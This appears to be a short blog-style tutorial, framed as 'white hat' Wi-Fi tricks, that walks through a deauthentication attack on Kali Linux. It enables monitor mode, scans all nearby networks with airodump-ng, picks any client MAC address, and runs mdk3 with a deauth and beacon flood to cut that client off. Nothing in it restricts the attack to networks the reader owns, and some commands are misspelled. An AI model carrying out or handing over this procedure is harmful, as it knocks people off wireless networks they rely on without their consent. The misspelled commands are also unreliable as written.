Today the hacks are about the white hat tricks in wi-fi network, what happens if some one doing weird stuff in your wi-fi network.
The solution is : 1) You can kick the use from the network. 2) You can ban his IP. 3) You can flood the network and many more. Today I will be sharing with you about how to deauthenticate the user from the network. If you are using linux (Kali linux).
Steps:- 1) Goto your terminal and type iwconfig >> this will shows your wifi card and enable it by using >>"airomon-ng start wlan0(ur card name). 2) After enabling type "airodump-ng mon0" to see and dump all the networks around you. 3) Select any user mac address that you wanna kick i:e;station and open up ur new terminal and type "echo mac-address >> example.txt". 4) Now open up new terminal and type "mdk3 mon0 d b example.txt(here d is the deauth attack and b is the becon flood account and example.txt is the mac address ur using to kick). 5) Now the user is getting deauth and no acess to the network